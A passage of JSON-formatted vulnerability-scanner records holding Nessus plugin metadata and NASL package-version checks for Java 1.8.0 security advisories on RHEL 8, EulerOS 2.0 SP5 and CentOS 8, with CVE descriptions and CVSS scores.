'rhel-8-for-s390x-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-s390x-sap-netweaver-rpms',\n 'rhel-8-for-s390x-sap-netweaver-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-source-rpms'\n ],\n 'enterprise_linux_8_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-rpms',\n 'rhel-8-for-x86_64-sap-solutions-source-rpms'\n ],\n 'enterprise_linux_8_supplementary': [\n 'rhel-8-for-aarch64-supplementary-eus-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms',\n 'rhel-8-for-aarch64-supplementary-rpms',\n 'rhel-8-for-aarch64-supplementary-source-rpms',\n 'rhel-8-for-s390x-supplementary-eus-rpms',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms',\n 'rhel-8-for-s390x-supplementary-rpms',\n 'rhel-8-for-s390x-supplementary-source-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms',\n 'rhel-8-for-x86_64-supplementary-rpms',\n 'rhel-8-for-x86_64-supplementary-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n 
append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0530');\n}\n\npkgs = [\n {'reference':'java-1.8.0-ibm-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-demo-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-demo-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n 
{'reference':'java-1.8.0-ibm-devel-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-devel-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-headless-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-headless-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-jdbc-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 
'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-jdbc-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-plugin-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-src-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-src-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 
'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-webstart-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, 
rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'java-1.8.0-ibm / java-1.8.0-ibm-demo / java-1.8.0-ibm-devel / etc');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-09T17:09:56", "description": "According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). 
Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-02-04T00:00:00", "title": "EulerOS 2.0 SP5 : java-1.8.0-openjdk (EulerOS-SA-2021-1198)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-04T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:java-1.8.0-openjdk", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1198.NASL", "href": "https://www.tenable.com/plugins/nessus/146108", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146108);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : java-1.8.0-openjdk (EulerOS-SA-2021-1198)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). 
Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. 
Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1198\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f189fc3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.8.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is 
Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"java-1.8.0-openjdk-1.8.0.191.b12-0.h18.eulerosv2r7\",\n \"java-1.8.0-openjdk-devel-1.8.0.191.b12-0.h18.eulerosv2r7\",\n \"java-1.8.0-openjdk-headless-1.8.0.191.b12-0.h18.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk\");\n}\n", "cvss": 
{"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-04T09:23:12", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4347 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\n - OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-02-01T00:00:00", "title": "CentOS 8 : java-1.8.0-openjdk (CESA-2020:4347)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-01T00:00:00", "cpe": ["p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc-zip", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-accessibility", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-devel", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-demo", "cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-headless", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-src", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc", 
"cpe:/a:centos:centos:8::appstream", "p-cpe:/a:centos:centos:java-1.8.0-openjdk"], "id": "CENTOS8_RHSA-2020-4347.NASL", "href": "https://www.tenable.com/plugins/nessus/145849", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:4347. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145849);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/03\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"RHSA\", value:\"2020:4347\");\n\n script_name(english:\"CentOS 8 : java-1.8.0-openjdk (CESA-2020:4347)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4347 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\n - OpenJDK: Race 
